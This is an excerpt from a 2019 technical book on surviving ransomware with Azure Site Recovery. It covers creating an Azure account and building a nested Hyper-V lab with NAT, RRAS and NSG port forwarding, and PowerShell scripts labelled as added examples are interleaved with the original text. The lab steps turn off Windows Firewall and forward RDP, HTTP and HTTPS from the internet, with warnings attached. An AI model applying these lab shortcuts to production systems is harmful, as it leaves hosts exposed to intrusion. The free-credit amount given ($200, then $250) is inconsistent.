
Surviving a Ransomware Attack with Azure Site Recovery
Volume 1

By Microsoft MVPs:
Dave Kawula Cristal Kawula
Emile Cabot Cary Sun
John O’Neill Sr - rMVP
PUBLISHED BY

MVPDays Publishing
http://www.mvpdays.com

Copyright © 2019 by MVPDays Publishing

All rights reserved. No part of this book may be reproduced or transmitted in any form or by any
means without the prior written permission of the publisher.

ISBN: TBD

Warning and Disclaimer


Every effort has been made to make this manual as complete and as accurate as possible, but no
warranty or fitness is implied. The information provided is on an “as is” basis. The authors and
the publisher shall have neither liability nor responsibility to any person or entity concerning any
loss or damages arising from the information contained in this book.

Feedback Information
We’d like to hear from you! If you have any comments about how we could improve the quality
of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an
email to dave@mvpdays.com.


Foreword by

Acknowledgments
From Dave
Cristal, you are my rock and my source of inspiration. For the past 20+ years you have been
there with me every step of the way. Not only are you the “BEST Wife” in the world, you are my
partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids are
so patient with your dear old dad when he locks himself away in the office for yet another book.
Taking the time to watch you grow in life, sports, and become little leaders of this new world is
incredible to watch.

Thank you, Mom and Dad (Frank and Audry), and my brother Joe. You got me started in this
crazy IT world when I was so young. Brother, you mentored me along the way, both coaching me
in hockey and helping me learn what you knew about PCs and servers. I’ll never forget us as
teenage kids working the IT support contract for the local municipal government. Remember,
Dad had to drive us to site because we weren’t old enough to drive ourselves yet. A great
career starts with the support of your family, and I’m so lucky because I have all the support one
could ever want.

Last but not least, the MVPDays volunteers: you have donated your time and expertise and
helped us run the event in over 20 cities across North America. Our latest journey has us
expanding the conference worldwide as a virtual conference. For those of you that will read this
book, your potential is limitless; just expand your horizons, and you never know where life will
take you.


About the Authors


Dave Kawula – Microsoft MVP
Dave is a Microsoft Most Valuable Professional (MVP) with over 20 years of experience in the IT
industry. His background includes data communications networks within multi-server
environments, and he has led architecture teams for virtualization, System Center, Exchange,
Active Directory, and Internet gateways. Very active within the Microsoft technical and
consulting teams, Dave has provided deep-dive technical knowledge and subject matter
expertise on various System Center and operating system topics.

Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam
technologies. Locating Dave is easy as he speaks at several conferences and sessions each year,
including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn.

Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with
fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference
over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can
meet him in person. Check out his speaking site at www.davekawula.com

He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando.

As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading
technology expert for both local customers and large international enterprises, providing optimal
guidance and methodologies to achieve and maintain an efficient infrastructure.

BLOG: www.checkyourlogs.net

Twitter: @DaveKawula


Cristal Kawula – Microsoft MVP


Cristal Kawula is the co-founder of MVPDays Community Roadshow and #MVPHour live Twitter
Chat. She was also a member of the Technical Advisory board and is the President of TriCon Elite
Consulting. Cristal is also only the second woman in the world to receive the prestigious Veeam
Vanguard award.

Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is
extremely active in the community and has recently helped publish a book for other women
MVPs called Voices from the Data Platform.

This year at Microsoft Ignite she led community meetups for various topics such as Women in
IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar.

BLOG: http://www.checkyourlogs.net

Twitter: @supercristal1


Emile Cabot – Microsoft MVP


Emile started in the industry during the mid-90s working at an ISP and designing celebrity web
sites. He has a strong operational background specializing in Systems Management and
collaboration solutions and has spent many years performing infrastructure analyses and
solution implementations for organizations ranging from 20 to over 200,000 employees.
Coupling his wealth of experience with a small partner network, Emile works very closely with
TriCon Elite, 1E, and Veeam to deliver low-cost solutions with minimal infrastructure
requirements.

He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each
year for first aid services and public education at Castle Mountain Resort and in the community.

BLOG: http://www.checkyourlogs.net

Twitter: @ecabot


Cary Sun – Microsoft MVP

Cary Sun is a Cisco Certified Internetwork Expert (CCIE No. 4531) and holds MCSE, MCITP, and Citrix
CCA certifications, with over twenty years in the planning, design, and implementation of network
technologies, management, and system integration. His background includes hands-on experience with
multi-platform environments, all LAN/WAN topologies, network administration, e-mail and Internet
systems, security products, and PC and server environments. His expertise is analyzing users’ needs and
coordinating system designs from concept through implementation. He has exceptional analysis,
organization, communication, and interpersonal skills, and a demonstrated ability to work independently
or as an integral part of a team to achieve objectives and goals. Specialties: CCIE / CCNA / MCSE / MCITP /
MCTS / MCSA / Solution Expert / CCA

Cary is a very active blogger at checkyourlogs.net and is always available online for questions
from the community. His passion for technology is contagious, and he makes everyone around
him better at what they do.

Blog: http://www.checkyourlogs.net

Twitter: @SifuSun


John O’Neill Sr – Re-Connect Microsoft MVP


Contents

Foreword by .................................................................................................................. iii

Acknowledgments ........................................................................................................ iii


From Dave ............................................................................................................. iii

About the Authors ........................................................................................................ iv


Dave Kawula – Microsoft MVP .................................................................................... iv
Cristal Kawula – Microsoft MVP ................................................................................... v
Emile Cabot – Microsoft MVP ..................................................................................... vi
Cary Sun – Microsoft MVP ......................................................................................... vii
John O’Neill Sr – Re-Connect Microsoft MVP .......................................................... viii

Contents........................................................................................................................ ix

Introduction ................................................................................................................. 14

MVPDays Online .......................................................................................................... 14


Sample Files ............................................................................................................. 15
Additional Resources ................................................................................................ 15

Chapter 1...................................................................................................................... 17

Setting up your Azure Subscription from Scratch .................................................... 17

Chapter 2...................................................................................................................... 24

Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure ........... 24


Building a Windows Server 2016 Virtual Machine ................................................ 24


Creating Multiple Internal and External IP’s for the Lab ........................................ 35
Enable Hyper-V in the LAB Virtual Machine ......................................................... 42
Configuring NAT Networking with one Public IP Address ..................................... 50
Configuring NAT Networking with Multiple Public IP Address ................................... 53
Adding an IP Address to the lab Host (VM) .......................................................... 53
Configuring Routing and Remote Access on the Azure Nested Virtual Machine... 57
Configure NAT Rules in RRAS for the Lab ........................................................... 65
Disable Windows Firewall .................................................................................... 72
Create a NAT Rule in the Azure NSG for the Lab................................................. 74
Testing the NAT Rules in the lab .......................................................................... 80
Using PowerShell to automate RRAS NAT Rule Configurations........................... 85

Chapter 3...................................................................................................................... 88

Using BigDemo to Build your Lab .............................................................................. 88


Lab Server Names .................................................................................................... 88
Building the Lab with BigDemo_ASR_WAC.PS1 ...................................................... 91

Chapter 4...................................................................................................................... 95

Configuring Windows Admin Center ......................................................................... 95


Install Google Chrome and Mozilla FireFox .......................................................... 96
Configure Windows Admin Center........................................................................ 97
Configure Azure Integration.................................................................................. 99
Configure Azure Backup .................................................................................... 104
Verifying Backups locally with the Backup Microsoft Azure Backup Agent ......... 110
Configuring Windows Azure Update Management ............................................. 112


Configure Azure Site Recovery .......................................................................... 119


Upgrade to Security Center Standard in Azure ................................................... 125

Chapter 5.................................................................................................................... 127

Windows Defender Advanced Threat Protection ATP ............................................ 127


Onboarding a Server with Windows Defender ATP ............................................ 128
Reviewing an Incident with Windows Defender Advanced Threat Protection ..... 130

Chapter 6.................................................................................................................... 133

Simulating a Ransomware Attack ............................................................................ 133


KnowBe4 Ransomware Simulator on Windows Server 2019.............................. 133
Enabling Ransomware Protection on Windows Server 2019 .............................. 141
Executing a Ransomware Attack with PowerShell .............................................. 145

Chapter 7.................................................................................................................... 152

Recovering from Ransomware using Azure Site Recovery ................................... 152


Notes from the Field................................................................................................ 152
Why Airgapped Replicas are the only choice ..................................................... 152
Why Planned Failover is no longer an option ..................................................... 152
Failover Now is the only Option .......................................................................... 153
Watch you Six (Clock) ........................................................................................ 153
Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site
VPN ................................................................................................................... 154
When can I get back into my data? .................................................................... 154
Ok, so I didn’t listen and lost everything now what? ........................................... 155
Don’t forget to tune your Replication Policy ........................................................ 156
Testing Failover can be a quick Ransomware Fix .............................................. 156


Reset Settings for your Azure Site Recovery Hyper-V Host................................ 157
Enable Diagnostic Logging for Azure Site Recovery........................................... 162
Zero Day time to Failover ........................................................................................ 163
Assuming an Admin Level breach Failing over 100 % to Azure .......................... 163
Executing a PowerShell based Ransomware Attack on Domain Controllers. ..... 163
Encrypting the Sysvol Folder .............................................................................. 165
Taking Down Production Killing Domain Controllers with Ransomware .............. 171
Encrypting the Active Directory Database .......................................................... 171
Survival Mode Recovering to Azure ........................................................................ 178
Tick Tock time to make a decision – We are Recovering to Azure ..................... 179
Performing the Double Swing Recovery ............................................................. 180

Chapter 8.................................................................................................................... 188

Disaster Recovery items left forgotten .................................................................... 188

Chapter 9.................................................................................................................... 189

Join us at MVPDays and meet great MVP’s like this in person .............................. 189
Live Presentations .................................................................................................. 189
Video Training......................................................................................................... 189
Live Instructor-led Classes ...................................................................................... 190
Consulting Services ................................................................................................ 190


Introduction MVPDays Online

Introduction

MVPDays Online
The purpose of this book is to showcase the fantastic expertise of our guest speakers of
MVPDays Online. They have so much passion, expertise, and expert knowledge that it only
seemed fitting to write it down in a book.

MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea:
“There’s got to be a good way for Microsoft MVPs to reach the IT community and share their
vast knowledge and experience in a fun and engaging way.” I mean, what is the point in
recognizing these bright and inspiring individuals and not leveraging them to inspire the
community that they are a part of?

We often get asked the question, “Who should attend MVPDays?”

Anyone that has an interest in technology, is eager to learn, and wants to meet other like-minded
individuals. This Roadshow is not just for Microsoft MVPs; it is for anyone in the IT community.

Make sure you check out the MVPDays website at www.mvpdays.com. You never know, maybe
the roadshow will be coming to a city near you.

The goal of this particular book is to show you how to survive a Ransomware Attack using Azure
Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some
immense value in what we have written.


Sample Files
All sample files for this book can be downloaded from www.checkyourlogs.net and
https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery

Additional Resources
In addition to all the tips and tricks provided in this book, you can find extra resources like
articles and video recordings on our blog http://www.checkyourlogs.net


Chapter 1 Setting up your Azure Subscription from Scratch

Chapter 1

Setting up your Azure Subscription from Scratch
As we know, there are lots of features in Microsoft Azure. To use them, you need to create a
Microsoft Azure account. It is straightforward to create, and you will get $200 of credit for the
first month.

If you are a newcomer to Microsoft Azure, no worry: I am going to show you how to create an
Azure free account with $200 credit today. Follow the steps below.

1. Go to https://www.azure.com and then click Free account.


2. On the free account page, click Start free.

3. If you have an account with Microsoft already (e.g., Office 365, outlook.com, ...), enter
your email address and then click Next. If you don’t have a Microsoft account, click
Create one.

4. If your email address is used with more than one account from Microsoft, you need to
select which account you want to use.


5. Enter your password and then click Sign in.


6. On the About you page, enter your personal information and then click Next.

7. On the Identity verification by card page, you need to enter your credit card information
and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free
account to pay-as-you-go or another account type.

8. On the Agreement page, select I agree to the subscription agreement, offer details, and
privacy statement and I would like information, tips, and offers from Microsoft or
selected partners about Azure, including Azure Newsletter, Pricing updates, and other
Microsoft products and services, and then click Sign up.

9. Congratulations! You’re ready to start with Azure and get $250 of credit for free. Click
Go to the portal and enjoy the Azure features there.

10. That’s it! You have now successfully set up your first Azure tenant and have access to the
Azure Portal.

Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

Chapter 2

Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
In this chapter, we are going to show you how to build a Hyper-V nested VM with multiple public
IP addresses. In this lab configuration, you only need to pay Microsoft for one Hyper-V host
(VM) with storage and public IP addresses. After it is configured, you can install a firewall, create
VMs and a load balancer, configure custom routing, port forwarding, and so on. These scenarios
can be used to build real-world labs for test, development, or even proofs of concept.

Building a Windows Server 2016 Virtual Machine

1. Logon to your Microsoft Azure Account and select Create a resource.


2. On the New page, select Windows Server 2016 VM.

3. On the Create a virtual machine page, click Basics and select your Azure Subscription to
pay for this virtual machine.

4. Select Create new under Resource group and enter a resource group name. I recommend
using your virtual machine name, because that makes your resources easier to maintain.
Then click OK.

5. Virtual machine name: Enter the virtual machine name (the same as your resource group name).
Region: Select the region for the virtual machine. In my case, I am using West US 2.
Availability options: keep the default setting.
Image: select Windows Server 2016 Datacenter.
Size: click Change size and select a Dv3 or Ev3 VM size, because these sizes are needed to
enable nested virtualization.
Username: Enter the login user name.
Password: Enter the login password.


Confirm password: Reenter login password

Public inbound ports: Select Allow selected ports.


Select inbound ports: Select RDP (3389)
Already have a Windows license: Select Yes if you have a license already.
Confirmation: select I confirm I have an eligible Windows license with Software
Assurance or Windows Server subscription to apply for this Azure Hybrid Benefit.


6. On the Create a Virtual Machine page, click Disks.

OS disk type: Select Premium SSD


DATA DISKS: Select Create and attach a new disk (this storage space is for your nested
VMs)


7. On the Create a new disk page, use the settings below and then click OK.
Disk type: Select Premium SSD
Name: keep the default name
Size(GiB): 4095
Source type: None


8. On the Create a virtual machine page, click Networking.

Virtual network: Select your vnet if you already have one; if not, keep the default
settings.
Subnet: Select the subnet if you already have one; if not, keep the default
settings.
Public IP: click Create new


9. On the Create Public IP address page, the settings are as follows:

Name: Enter the Public IP address name.
SKU: Basic
Assignment: Static

10. Complete the Networking settings as follows:
Network security group: Basic
Public inbound ports: Allow selected ports
Select inbound ports: RDP


Accelerated networking: On

11. On the Create a virtual machine page, click Management and keep the default settings.

12. On the Create a virtual machine page, click Guest config and keep the default settings.

13. On the Create a virtual machine page, click Tags and keep the default settings.

14. On the Create a virtual machine page, click Review + create, make sure Validation
passed, and then click Create.


Creating Multiple Internal and External IP’s for the Lab

1. On the Microsoft Azure portal page, select Virtual machines.

2. On the Virtual machines page, click GDMCALABHV1.


3. On the GDMCALABHV1 page, select Networking.

4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.

5. On the Network Interface page, select IP configurations.


6. On the IP configurations page, select ipconfig1.

7. Change assignment setting from Dynamic to Static, and then click Save.

8. Go back to the IP configurations page, click Add.

9. On the Add IP configuration page, use the settings below and then click OK.


Name: ipconfig2
Private IP address allocation: Static
IP address: 10.10.1.9
Public IP address: Enable
IP address: click Configure required settings

10. Choose public IP address: Create new
Name: Enter a name for the Public IP
SKU: Basic
Assignment: Static, and then click OK



11. On the Add IP configuration page, click OK.


12. Repeat the Add IP configuration steps if you need more public IP addresses.


Enable Hyper-V in the LAB Virtual Machine

1. Start Azure virtual machine and log in.

2. Open Disk Management to partition and format your new 4TB storage space. (Use
ReFS with a 64 KB block size.)


3. On the Server Manager Dashboard, click Add roles and features.

4. On the Before you begin page, click Next.


5. On the Select installation type page, select Role-based or feature-based installation and then
click Next.

6. On the Select destination server page, click Next.


7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.

8. On the Select features page, click Next.


9. On the Hyper-V page, click Next.

10. On the Create Virtual Switches page, don’t select any interface and click Next.


11. On the Virtual Machine Migration page, click Next.

12. On the Default Stores page, you can change the default location to your new 4TB storage
space and then click Next.


13. On the Confirm installation selections page, select Restart the destination server
automatically if required and then click Install.

14. Log in to the Azure virtual machine after it has restarted.

15. On the Installation progress page, click Close.


Configuring NAT Networking with one Public IP Address

To configure NAT networking, we need to create an internal virtual switch for the nested guest VMs.
In general, there are two options for networking with nested virtual machines: MAC address
spoofing and NAT networking. Unfortunately, MAC address spoofing is not possible in a public
cloud environment. So, if you use an Azure virtual machine network interface as your
Hyper-V external virtual switch and assign it to nested guest VMs, the guest VMs won’t
be able to access the Internet. At this point, we have no choice but to use NAT networking.

The steps below show how to configure a NetNat virtual switch with a single public IP address.

1. We can create an internal virtual switch and the NAT via PowerShell cmdlets as
follows (the interface index passed to New-NetIPAddress is the one Get-NetAdapter
reports for the new vEthernet (NATNetwork) adapter, 14 in this example):

# Internal switch that the nested guests will connect to
New-VMSwitch -Name "NATNetwork" -SwitchType Internal

# Find the ifIndex of the host-side adapter "vEthernet (NATNetwork)"
Get-NetAdapter

# Default gateway address for the nested guests, assigned to that adapter
New-NetIPAddress -IPAddress 192.168.100.1 -PrefixLength 24 -InterfaceIndex 14

# NAT for the whole lab subnet
New-NetNat -Name "NATNetwork" -InternalIPInterfaceAddressPrefix 192.168.100.0/24


2. You can also configure port forwarding with a PowerShell cmdlet as follows. Each mapping
sends traffic that arrives on the host’s public address at the external port to the nested guest
at 192.168.100.99:

# Forward HTTPS (443) into the nested guest
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 443 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 443 -NatName NatNetwork

# Forward HTTP (80) into the nested guest
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 80 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 80 -NatName NatNetwork
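Putting the single-public-IP steps together, here is an added PowerShell script that is not from the book or its sample files: it creates the internal switch, looks up the vEthernet adapter's interface index instead of hard-coding 14, creates the NAT, adds the port mappings only when they are missing so the script can be re-run, and lists the result. It assumes the NATNetwork switch name, the 192.168.100.0/24 lab range and the 192.168.100.99 guest from the steps above; the port list is a constructed sample.

```powershell
#Requires -RunAsAdministrator
# Added example: NetNat lab networking with one public IP, built from the steps above.
$SwitchName   = "NATNetwork"
$GatewayIP    = "192.168.100.1"
$PrefixLength = 24
$NatPrefix    = "192.168.100.0/24"
$GuestIP      = "192.168.100.99"           # nested VM that receives forwarded traffic
$Mappings     = @(                         # constructed sample of port forwards
    @{ Protocol = "TCP"; ExternalPort = 443; InternalPort = 443 },
    @{ Protocol = "TCP"; ExternalPort = 80;  InternalPort = 80  }
)

# 1. Internal switch for the nested guests (create only if it does not exist yet)
if (-not (Get-VMSwitch -Name $SwitchName -ErrorAction SilentlyContinue)) {
    New-VMSwitch -Name $SwitchName -SwitchType Internal | Out-Null
}

# 2. Look up the host-side vEthernet adapter instead of hard-coding -InterfaceIndex 14
$adapter    = Get-NetAdapter -Name "vEthernet ($SwitchName)"
$hasGateway = Get-NetIPAddress -InterfaceIndex $adapter.ifIndex -AddressFamily IPv4 -ErrorAction SilentlyContinue |
    Where-Object { $_.IPAddress -eq $GatewayIP }
if (-not $hasGateway) {
    New-NetIPAddress -IPAddress $GatewayIP -PrefixLength $PrefixLength -InterfaceIndex $adapter.ifIndex | Out-Null
}

# 3. NAT object for the lab subnet; reuse it if a previous run already created it
$nat = Get-NetNat -Name $SwitchName -ErrorAction SilentlyContinue
if (-not $nat) {
    $nat = New-NetNat -Name $SwitchName -InternalIPInterfaceAddressPrefix $NatPrefix
}

# 4. Static port mappings; skip any that already exist so re-running does not fail
$existing = Get-NetNatStaticMapping -NatName $SwitchName -ErrorAction SilentlyContinue
foreach ($m in $Mappings) {
    $dup = $existing | Where-Object { $_.Protocol -eq $m.Protocol -and $_.ExternalPort -eq $m.ExternalPort }
    if ($dup) { continue }
    Add-NetNatStaticMapping -NatName $SwitchName -Protocol $m.Protocol `
        -ExternalIPAddress "0.0.0.0/24" -ExternalPort $m.ExternalPort `
        -InternalIPAddress $GuestIP -InternalPort $m.InternalPort | Out-Null
}

# 5. Show what is now forwarded into the lab
Get-NetNatStaticMapping -NatName $SwitchName |
    Select-Object Protocol, ExternalIPAddress, ExternalPort, InternalIPAddress, InternalPort |
    Format-Table -AutoSize
```

Every mapping listed at the end is reachable on the host's public IP, so keep the Azure NSG limited to the ports you actually intend to expose.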


Configuring NAT Networking with Multiple Public IP Addresses

For a real proof of concept (PoC) or production environment, we may need more than one public
IP address. We have found that this isn’t possible with the NetNat internal vSwitch. As a result,
we have figured out how to set this up using Microsoft Routing and Remote Access on the host
(Azure VM). These steps are the most critical part of this book.

They allow us to add as many external public IP addresses in Azure as we need and NAT them into
our lab virtual machines. This gives you the most realistic lab experience possible.

Adding an IP Address to the lab Host (VM)


1. Login to Azure Virtual Machine.

2. Open Command prompt and run ipconfig /all and then write down the DNS IP address.

3. Add all of the IP addresses to the Azure virtual machine network interface. In my case
they are 10.10.1.8-10.


4. Re-run ipconfig /all, and you will now see all of the IP addresses under the network
interface.

5. Open Hyper-V Manager tool and click Virtual Switch Manager.


6. Select Internal and click Create Virtual Switch.


7. Change switch name to NAT Network Switch and then click OK.

8. Assign IP address as 192.168.100.1/24 to vEthernet (NAT Network Switch)


Configuring Routing and Remote Access on the Azure Nested Virtual Machine

To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote
Access role in Windows. The steps below will walk you through the configuration required.

Log in to the nested Azure virtual machine, then:

1. On the Dashboard page, select Add Roles and features.
2. On the Before you begin page, click Next.
3. On the Select installation type page, click Next.
4. On the Select destination server page, click Next.
5. On the Select server roles page, select Remote Access and click Next.
6. On the Select features page, click Next.
7. On the Remote Access page, click Next.
8. On the Select Role Services page, select Routing, click Add Features, and then click
Next.
9. On the Web Server Role (IIS) page, click Next.


57
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

10. On the Select role services page, click Next.


11. On the Confirm installation selections page, select Restart the destination server
atomically if required, click Install.

12. On the Installation progress page, click Close.


13. Open Routing and Remote Access tool.

58
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

14. Right-click the server name and select Configure and Enable Routing and Remote Access.

15. On the Welcome page, click Next.

59
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

16. On the Configuration page, select Network address translation (NAT), click Next.

60
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.

61
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

18. On the Name and Address Translation Services page, select Enable basic name and
address services, click Next.

62
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

19. On the Address Assignment Range page, click Next.

63
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure

20. Click Finish on the Completing setup wizard page.

64
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
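The host-side part of the two procedures above (the internal switch with its gateway address, and the Routing role) can be done from an elevated PowerShell prompt on the nested host instead of clicking through Hyper-V Manager and the Add Roles wizard. This is an added example, not code from the book; the switch name and addresses are the chapter's, and the Azure adapter alias 'Ethernet 2' is assumed from the RRAS wizard step. Enabling NAT on the interface is still done with the wizard in steps 14 to 21.

```powershell
# Added example (not from the book): prepare the nested Hyper-V host for RRAS NAT.
$SwitchName   = 'NAT Network Switch'
$GatewayIP    = '192.168.100.1'
$PrefixLength = 24
$PublicNic    = 'Ethernet 2'   # assumption: the adapter that carries the Azure private IPs

# 1. Internal switch. Guests on it can only reach the host's vEthernet adapter,
#    which is why RRAS has to route between this switch and the Azure adapter.
if (-not (Get-VMSwitch -Name $SwitchName -ErrorAction SilentlyContinue)) {
    New-VMSwitch -Name $SwitchName -SwitchType Internal | Out-Null
}

# 2. Gateway address for the lab subnet on the host side of the switch.
#    The vEthernet adapter appears a moment after the switch is created.
$vEthernet = "vEthernet ($SwitchName)"
for ($i = 0; $i -lt 10 -and -not (Get-NetAdapter -Name $vEthernet -ErrorAction SilentlyContinue); $i++) {
    Start-Sleep -Seconds 2
}
if (-not (Get-NetIPAddress -InterfaceAlias $vEthernet -IPAddress $GatewayIP -ErrorAction SilentlyContinue)) {
    New-NetIPAddress -InterfaceAlias $vEthernet -IPAddress $GatewayIP -PrefixLength $PrefixLength | Out-Null
}

# 3. Remote Access role with the Routing role service and its PowerShell module.
$features = Install-WindowsFeature -Name RemoteAccess, Routing, RSAT-RemoteAccess-PowerShell -IncludeManagementTools
if ($features.RestartNeeded -eq 'Yes') { Write-Warning 'Reboot required before running the RRAS wizard.' }

# 4. Sanity check. The secondary addresses added in the Azure portal must already
#    be visible on the public adapter; Azure only delivers traffic for addresses
#    it knows about, so adding them in Windows alone is not enough, and an address
#    pool entry in RRAS for an address Azure never routes will never see a packet.
$azureAddresses = Get-NetIPAddress -InterfaceAlias $PublicNic -AddressFamily IPv4 |
    Select-Object -ExpandProperty IPAddress
"Addresses on $PublicNic : $($azureAddresses -join ', ')"
"Lab gateway on $vEthernet : " + (Get-NetIPAddress -InterfaceAlias $vEthernet -AddressFamily IPv4).IPAddress
```

Compare the first output line with the addresses you added in the portal before continuing; if one is missing, ipconfig /all will not show it either and the NAT rules for it will silently fail.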

Configure NAT Rules in RRAS for the Lab

1. Open Routing and Remote Access, expand IPv4 and select NAT.

2. Right-click Ethernet 2 and select Properties.

3. Select the Address Pool tab and click Add.

4. Enter the IP addresses and mask and click OK. These are the private addresses that were paired with public IP addresses in the Azure portal (10.10.1.8 to 10.10.1.10 in our case).

5. Select the Services and Ports tab and click Add.

6. Use the following settings for TCP port 443 port forwarding and click OK:
   Description of Service: TCP443-10.10.1.10
   On this address pool entry: 10.10.1.10
   Protocol: TCP
   Incoming port: 443
   Private address: 192.168.100.99
   Outgoing port: 443

7. On the Ethernet 2 Properties page, click OK.

8. Repeat the steps to create rules for port 80 and port 3389. Forwarding 3389 exposes RDP on the nested VM to the internet, which is the most common initial access vector for ransomware operators, so restrict the source address of the matching Azure NSG rule to your own public IP address rather than Any.

Disable Windows Firewall

1. We will rely on the Azure NSG for filtering, so disable the Windows Firewall on the Azure virtual machine. This leaves the host with no filtering of its own, so the NSG rules created in the next section are the only control between the internet and the host; keep them as tight as the lab allows.

2. In Server Manager, select Local Server and click the Windows Firewall value (Public: On, Private: On).

3. On the Windows Firewall page, select Turn Windows Firewall on or off.

4. On the Customize Settings page, select Turn off Windows Firewall for both the Private network and the Public network settings and click OK.

Create a NAT Rule in the Azure NSG for the Lab

The following steps show you how to create an inbound rule on the Azure Network Security Group (NSG) attached to the host.

1. Go back to the Azure portal and log in with your account.

2. On the Dashboard page, select Virtual machines.

3. On the Virtual machines page, select the virtual machine you are using as the Hyper-V host.

4. On the GDMCALABHV1 virtual machine page, select Networking.

5. On the Networking page, click Add inbound port rule.

6. On the Add inbound security rule blade, change Destination port ranges to 443, Protocol to TCP and Name to Port_443, then click Add.

7. Repeat the steps to add port 80 (and port 3389 if you forwarded RDP in RRAS; for that rule set Source to your own public IP address rather than Any).
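The Azure-side work above, attaching one more private/public IP pair to the host's NIC (step 3 of "Adding an IP Address") and creating the NSG inbound rules, can be scripted with Az PowerShell. This is an added example, not code from the book: the resource group, location, NIC and NSG names are assumptions, while the VM name GDMCALABHV1, the public IP name GDMCALABHV1-PublicIP3 and the 10.10.1.x addresses come from the chapter. Run it after Connect-AzAccount.

```powershell
# Added example (not from the book): Azure NIC secondary IP and NSG rules for the lab host.
$ResourceGroup = 'GDMCALAB-RG'            # assumed
$Location      = 'canadacentral'          # assumed
$NicName       = 'gdmcalabhv1-nic'        # assumed
$NsgName       = 'GDMCALABHV1-nsg'        # assumed
$AdminSourceIp = '203.0.113.10'           # your own public IP (TEST-NET-3 placeholder)

# 1. Secondary IP configuration: private 10.10.1.10 paired with a new public IP.
#    Azure only delivers traffic for addresses it has assigned, so this cannot be
#    replaced by adding the address inside Windows.
$nic = Get-AzNetworkInterface -Name $NicName -ResourceGroupName $ResourceGroup
if (-not ($nic.IpConfigurations | Where-Object PrivateIpAddress -eq '10.10.1.10')) {
    $pip = New-AzPublicIpAddress -Name 'GDMCALABHV1-PublicIP3' -ResourceGroupName $ResourceGroup `
        -Location $Location -AllocationMethod Static -Sku Standard
    $nic = Add-AzNetworkInterfaceIpConfig -Name 'ipconfig3' -NetworkInterface $nic `
        -SubnetId $nic.IpConfigurations[0].Subnet.Id -PrivateIpAddress '10.10.1.10' `
        -PublicIpAddressId $pip.Id
    $nic | Set-AzNetworkInterface | Out-Null
}

# 2. NSG rules. 443 and 80 are the chapter's; the RDP rule is scoped to a single
#    source address because internet-exposed RDP is the usual way ransomware gets in.
$rules = @(
    @{ Name = 'Port_443';  Port = 443;  Source = 'Internet';     Priority = 300 }
    @{ Name = 'Port_80';   Port = 80;   Source = 'Internet';     Priority = 310 }
    @{ Name = 'Port_3389'; Port = 3389; Source = $AdminSourceIp; Priority = 320 }
)
$nsg = Get-AzNetworkSecurityGroup -Name $NsgName -ResourceGroupName $ResourceGroup
foreach ($r in $rules) {
    # Adding a rule whose name already exists fails, so replace it instead.
    if ($nsg.SecurityRules.Name -contains $r.Name) {
        $nsg = Remove-AzNetworkSecurityRuleConfig -Name $r.Name -NetworkSecurityGroup $nsg
    }
    $nsg = Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $r.Name `
        -Access Allow -Protocol Tcp -Direction Inbound -Priority $r.Priority `
        -SourceAddressPrefix $r.Source -SourcePortRange * -DestinationAddressPrefix * `
        -DestinationPortRange $r.Port
}
$nsg | Set-AzNetworkSecurityGroup | Out-Null

# 3. Check: no allow rule may expose 3389 to the whole internet.
(Get-AzNetworkSecurityGroup -Name $NsgName -ResourceGroupName $ResourceGroup).SecurityRules |
    Where-Object { $_.Access -eq 'Allow' -and $_.Direction -eq 'Inbound' -and
                   ($_.DestinationPortRange -contains '3389' -or $_.DestinationPortRange -contains '*') -and
                   ($_.SourceAddressPrefix -contains '*' -or $_.SourceAddressPrefix -contains 'Internet') } |
    ForEach-Object { Write-Warning "NSG rule $($_.Name) exposes RDP to the internet" }
```

The final check is worth keeping as a standing audit: a rule that allows 3389 from Internet or * is exactly the finding that precedes most ransomware incidents on internet-facing hosts.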

Testing the NAT Rules in the Lab

Now we can test the port forwarding and make sure it is working.

1. Create a guest virtual machine on the nested Azure host. Connect its network adapter to the NAT Network Switch and assign it the IP address 192.168.100.99/24 with default gateway 192.168.100.1; you can use 8.8.8.8 as the DNS server.

2. Enable Remote Desktop so that RDP (TCP port 3389) can be tested, and turn off the Windows Firewall on the guest.

3. Install the IIS role on this machine. If you would like to test SSL (port 443), set up and configure an SSL certificate in IIS.

4. From the internet, RDP to the Web-Test machine via its public IP address (GDMCALABHV1-PublicIP3).

